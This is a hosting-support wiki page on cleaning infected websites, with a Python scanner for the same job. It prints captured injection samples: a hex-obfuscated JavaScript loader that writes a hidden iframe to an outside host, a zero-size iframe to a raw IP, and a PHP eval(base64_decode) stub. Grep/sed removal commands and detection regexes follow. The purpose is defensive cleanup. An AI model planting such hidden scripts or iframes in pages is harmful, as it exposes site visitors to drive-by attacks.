Work:Virus on Site

From Zoelife4U Wiki

Got a customer that says his website has a virus? Here's what to look for and what to do about it.


How sites infect visitors

My first action is to look for a block of obfuscated JavaScript or one or more sets of iframe tags as the first or last lines of the affected page. If you don't see it there, go ahead and browse the content of the page to see if it's been more carefully placed.

Javascript

Example:

<script>function v48089e1ba7ba7(v48089e1ba7f8d){ function v48089e1ba8375 () {return 16;} return(parseInt(v48089e1ba7f8d,v48089e1ba8375()));}
function v48089e1ba8b45(v48089e1ba8f2f){ var v48089e1ba9316=''; for(v48089e1ba96fc=0; v48089e1ba96fc<v48089e1ba8f2f.length; v48089e1ba96fc+=2){ v48089e1ba9316+=(String.fromCharCode(v48089e1ba7ba7(v48089e1ba8f2f.substr(v48089e1ba96fc, 2)))); } return v48089e1ba9316;}
document.write(v48089e1ba8b45('3C696672616D65206E616D653D273227207372633D27687474703A2F2F636F6C65686F73742E636E2F696E6465782E706870272077696474683D333831206865696768743D323739207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

IFRAME

Example:

<iframe src="http://124.217.252.62/~admin/count.php?o=3" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Base64_Decode

<? /**/eval(base64_decode('...')); ?>

I think I found it. Now what?

Backup the file

We want to delete it of course, but always make a backup of the file before you do.

Remove the malicious code

Remove the bad stuff and save the changes.

Test for success

Browse to the page online again to see if it's still infected. Hit refresh or clear the cache as needed.

Look for more infected files

This is where it gets exciting. You might copy a unique-looking portion of the code and then see if you can find other files on the account that match. For example, v48089e1ba7ba7 from the JavaScript above, or 124.217.252.62 from the iframe. And here's how you might set up your search...

find ./ -type f -exec grep -HlF 'v48089e1ba7ba7' {} \;
find ./ -type f -exec grep -HlF '124.217.252.62' {} \;

These commands would return a list of filenames that match the search (-F treats the search string literally, so the dots in the IP address don't act as regex wildcards). Next, just manually back up and edit each in turn.

With clever use of the find and sed commands, it's possible to find and remove the malicious code from all infected files at once. This one is easy to screw up, so definitely have a backup.

cp -a public_html/ public_html.bak
find ./public_html/ -type f -exec sed -i 's/<iframe[^>]*124\.217\.252\.62[^>]*><\/iframe>//g' {} \;

Alternately, use the find and replace commands to do it.

find ./ -name page2.html -exec replace '<iframe src="http://124.217.252.62/~admin/count.php?o=3" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' '' -- {} \;

Rid some code from the files

Here are assorted commands to remove hacker code from files. Most have been tested to work.

Base64_Decode Hacks

for i in `grep -Rl base64_decode public_html/`; do [ -e "$i" ] && sed -i "s/eval(base64_decode('[^']*'));//g" "$i"; done

IFrame Hacks

for i in `grep -RlF 124.217.252.62 public_html/`; do [ -e "$i" ] && sed -i 's/<iframe[^>]*124\.217\.252\.62[^>]*><\/iframe>//g' "$i"; done
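As an added example (my own, not the wiki's), a small Python scanner that finds the three injection shapes shown above, decodes the hex-string payload so you can see what the hidden script would write, and backs each file up before stripping the injections with bounded patterns (so one sed-style greedy match can't eat legitimate content between two tags). The bad.example URLs, the sample page and the file names are all constructed for the demo.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Regexes for the three injection shapes shown above (written for this example, tuned to the wiki's samples).
PATTERNS = {
    # <script>...document.write(fn('3C6966...'))</script>: hex-string obfuscation; group 1 is the hex
    "hex_js": re.compile(r"<script>(?:(?!</script>).)*?document\.write\(\w+\('([0-9A-Fa-f]{20,})'\)\);?\s*</script>", re.S),
    # zero-size, display:none or style="hidden" iframe; non-greedy so two iframes on one line are not merged
    "hidden_iframe": re.compile(r"<iframe[^>]*?(?:width=[\"']?0\b|height=[\"']?0\b|display:\s*none|style=[\"']?hidden)[^>]*>\s*</iframe>", re.I),
    # PHP eval(base64_decode('...')); bounded by the quotes, never to the end of the line
    "base64_eval": re.compile(r"eval\(base64_decode\('[^']*'\)\);?"),
}
def decode_hex_payload(hexstr):
    """Reverse the page's obfuscation: every two hex digits are one character of the hidden HTML."""
    return bytes.fromhex(hexstr).decode("latin-1")
def scan_text(text):
    """Return (kind, detail) findings; for hex_js the detail is the decoded payload, i.e. the iframe it would write."""
    findings = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            findings.append((kind, decode_hex_payload(m.group(1)) if kind == "hex_js" else m.group(0)))
    return findings
def clean_file(path):
    """Back up path to path.bak first, then strip all three patterns; returns True if the file changed."""
    p = Path(path)
    shutil.copy2(p, p.with_name(p.name + ".bak"))
    cleaned = text = p.read_text(errors="replace")
    for rx in PATTERNS.values():
        cleaned = rx.sub("", cleaned)
    p.write_text(cleaned)
    return cleaned != text

# Constructed sample page (not the wiki's real payload): hex of a hidden iframe plus the other two shapes.
HIDDEN = "<iframe src='http://bad.example/x.php' style='display:none'></iframe>"
SAMPLE = ("<html><body>Hello</body>\n"
          "<script>function d(h){var s='';for(i=0;i<h.length;i+=2){s+=String.fromCharCode(parseInt(h.substr(i,2),16));}return s;}"
          f"document.write(d('{HIDDEN.encode().hex()}'));</script>\n"
          '<iframe src="http://bad.example/count.php?o=3" width=0 height=0 frameborder=0></iframe>\n'
          "<? /**/eval(base64_decode('aGVsbG8=')); ?>\n")

def demo():
    # Write the sample to a temp dir, scan it, clean it, and return everything worth checking.
    f = Path(tempfile.mkdtemp()) / "page2.html"
    f.write_text(SAMPLE)
    findings = scan_text(f.read_text())
    changed = clean_file(f)
    return {"findings": findings, "changed": changed, "cleaned": f.read_text(),
            "backup": f.with_name("page2.html.bak").read_text()}
```

Run scan_text over each file first and read the decoded hex_js findings before cleaning; the decoded iframe target is the indicator to grep the rest of the account for, as described above.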